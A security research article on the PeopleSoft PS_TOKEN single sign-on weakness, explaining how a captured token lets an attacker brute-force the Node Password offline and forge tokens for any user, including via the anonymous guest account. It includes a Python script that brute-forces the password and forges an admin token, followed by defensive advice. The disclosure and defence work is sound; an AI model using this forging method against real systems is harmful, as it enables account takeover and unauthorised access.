In the third part of the PeopleSoft Security series, we describe how to log in to any account and gain full access to a PeopleSoft system.

What is PeopleSoft SSO and how does it work?

Like many other enterprise business applications, PeopleSoft supports various Single Sign-On technologies. SSO enables authentication into several systems by a single action: the user logs into one system manually and into the others automatically.

PeopleSoft supports its own SSO implementation based on the PS_TOKEN cookie. Here is how it works:

1. User logs into the first PeopleSoft application;

2. PeopleSoft checks the user’s credentials. If successful, it returns the session cookie and the PS_TOKEN cookie to the user;

3. When the user tries to log into another PeopleSoft server, the browser automatically sends the PS_TOKEN;

4. The second PeopleSoft server receives the PS_TOKEN, parses it, and authenticates the user if the cookie is correct.

[Figure: PeopleSoft SSO]

Note that PS_TOKEN is the only thing the servers use to pass authentication state between them (the nodes have no back-end connection to each other), and it travels through the client, because it is a cookie.

There is an important term: Node. Put simply, a node is a system participating in SSO. Each application is a separate node, and one application may also contain several nodes. Each node must have a unique name.

Two settings are required to establish SSO between two servers. First, each PeopleSoft server must be told the node name of the other; that is how it knows to trust the node with that name. Second, each node must be given a Node Password, and that password must be the same on all PeopleSoft servers.

PeopleSoft SSO is therefore essentially a pre-shared key scheme.

A few more details about the PS_TOKEN format. Apart from some technical fields at the beginning, it carries only a few important values:

  • UserID – name of the user who has logged in
  • Lang – the user’s interface language
  • Node Name – name of the node which has authenticated the user
  • Date And Time – when the PS_TOKEN was issued
  • Signature = SHA1_Hash (UserID + Lang + Node Name + Date And Time + Node Password)

When a server receives a PS_TOKEN, it decodes the cookie (PS_TOKEN is base64-encoded), concatenates the four values with its own Node Password, computes the SHA1 hash and compares it with the Signature in the PS_TOKEN. If they match, the cookie has not been modified, and the server authenticates the user under that User ID.

TokenChpoken Attack

Does this really look secure?

The only value that goes into the Signature that the attacker does not already know is the Node Password: everything else is carried in clear text in the cookie.

If they can obtain the Node Password, they can forge a PS_TOKEN cookie with any User ID, and the Signature will verify.

How does one get the Node Password, then?

Easily: given any PS_TOKEN, we extract the important values from it, append candidate passwords one by one, and hash the result. When a hash equals the PS_TOKEN Signature, we have guessed the Node Password. The guessing is entirely offline; no further requests to the server are needed.
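As an added example (not ERPScan's TokenChpoken and not PeopleSoft code), the following Python models the scheme described above end to end: issuing a token, verifying it on the receiving node, recovering the Node Password offline from one captured token, and forging a token for a different UserID. It keeps only the documented essentials and assumes a toy encoding (fields joined with "|", UTF-8 strings, no leading technical fields), so it will not parse a real PS_TOKEN; the user IDs, node name, timestamp and the weak password "ps1" are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import itertools
import string

# Toy PS_TOKEN: UserID | Lang | NodeName | DateAndTime | Signature, base64-encoded.
# The '|' separator and UTF-8 strings are assumptions of this model, not PeopleSoft's format.
SEP = "|"


def signature(user_id, lang, node_name, issued_at, node_password):
    """Signature = SHA1(UserID + Lang + Node Name + Date And Time + Node Password)."""
    data = (user_id + lang + node_name + issued_at + node_password).encode("utf-8")
    return hashlib.sha1(data).hexdigest()


def make_token(user_id, lang, node_name, issued_at, node_password):
    """Issuing node: sign the four values and hand the cookie to the browser."""
    sig = signature(user_id, lang, node_name, issued_at, node_password)
    body = SEP.join((user_id, lang, node_name, issued_at, sig))
    return base64.b64encode(body.encode("utf-8")).decode("ascii")


def parse_token(token):
    """Receiving node (or attacker): base64-decode and split out the clear-text fields."""
    user_id, lang, node_name, issued_at, sig = base64.b64decode(token).decode("utf-8").split(SEP)
    return {"user_id": user_id, "lang": lang, "node_name": node_name,
            "issued_at": issued_at, "signature": sig}


def verify_token(token, node_password, trusted_nodes):
    """Receiving node: trusted node name + matching signature -> log in as UserID.

    Returns the authenticated UserID, or None if the token is rejected.
    """
    t = parse_token(token)
    if t["node_name"] not in trusted_nodes:
        return None
    expected = signature(t["user_id"], t["lang"], t["node_name"], t["issued_at"], node_password)
    if not hmac.compare_digest(expected, t["signature"]):
        return None
    return t["user_id"]


def bruteforce_node_password(token, candidates):
    """Attacker: every input to the hash except the Node Password is in the cookie,
    so one captured token is an offline oracle. No requests to the server are needed."""
    t = parse_token(token)
    for pw in candidates:
        if signature(t["user_id"], t["lang"], t["node_name"], t["issued_at"], pw) == t["signature"]:
            return pw
    return None


def forge_token(captured_token, node_password, new_user_id):
    """Attacker: keep Lang/NodeName/DateAndTime from the captured token, swap the
    UserID and re-sign with the recovered Node Password."""
    t = parse_token(captured_token)
    return make_token(new_user_id, t["lang"], t["node_name"], t["issued_at"], node_password)


def short_alnum_candidates(max_len=3):
    """Constructed search space: all lowercase+digit strings up to max_len (47,988 for 3)."""
    alphabet = string.ascii_lowercase + string.digits
    for n in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            yield "".join(chars)


def demo():
    """End-to-end run on constructed data: guest token -> Node Password -> admin token."""
    node_password = "ps1"                      # constructed weak Node Password
    trusted = {"PSFT_HR"}                      # the server's own default local node (name assumed)
    # Token the server issues to the automatically logged-in anonymous user (names constructed).
    captured = make_token("GUEST", "ENG", "PSFT_HR", "2015-05-07T10:00:00Z", node_password)
    guessed = bruteforce_node_password(captured, short_alnum_candidates())
    # Hypothetical high-privilege account the attacker wants to become.
    forged = forge_token(captured, guessed, "ADMIN_USER")
    return guessed, verify_token(forged, node_password, trusted)


if __name__ == "__main__":
    print(demo())   # ('ps1', 'ADMIN_USER')
```

The guessing loop is deliberately naive; a real tool drives it with wordlists and masks, and the cost per guess is one SHA1, so anything short or dictionary-based falls quickly. Run the same bruteforce against a token signed with a random 24-character Node Password and the loop simply exhausts its candidates and returns None, which is the whole point of the second defense below.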

I have written a tool called TokenChpoken that can parse, bruteforce, and recreate PS_TOKEN cookies. The attack may not seem dangerous enough, since it appears to apply only to systems where SSO is established, but there are two important nuances:

  • Every PeopleSoft application has at least one default local node: the node of the system itself, and it always trusts itself.
  • There are many situations in which an administrator has to set a Node Password for the default node.

Thus, even if you have never configured SSO and your PeopleSoft is a standalone server, it can be attacked in the same way, because a PS_TOKEN is still issued after authentication.

[Figure: User receives a PS_TOKEN after authentication]

However, the attack as described needs a PeopleSoft user account to obtain the first PS_TOKEN; in other words, it is a classic privilege escalation attack. What do we do if we have no account?

PeopleSoft's design has more secrets.

Normally no resource of a PeopleSoft Portal is reachable without authentication, but sometimes anonymous access is necessary. Imagine an HRMS portal exposed to the Internet that needs to let anonymous users browse open jobs and fill in the application form. Another typical example is password recovery: this is also a part of the system that an anonymous user can reach.

To make this work, there is a special PeopleSoft user with minimal privileges that is configured to log in automatically. When someone with no account visits this anonymous functionality, PeopleSoft authenticates them as that special user, and a PS_TOKEN cookie is issued for it, signed with the same Node Password.

To sum up, a lot of PeopleSoft applications can be attacked without any credentials at all.

Furthermore, PeopleSoft SSO is also used by other Oracle applications such as JD Edwards, which makes them attackable in the same way under certain circumstances.

How to defend your PeopleSoft system:

  • Disable SSO completely (often impossible, because parts of PeopleSoft will stop working without it)
  • Set a very complex Node Password (the maximum length is 24 characters), so that guessing it offline from a captured PS_TOKEN is infeasible
  • Use certificates instead of Node Passwords for node authentication

by Alexey Tyurin, Head of Oracle Security at ERPScan

CISO Platform
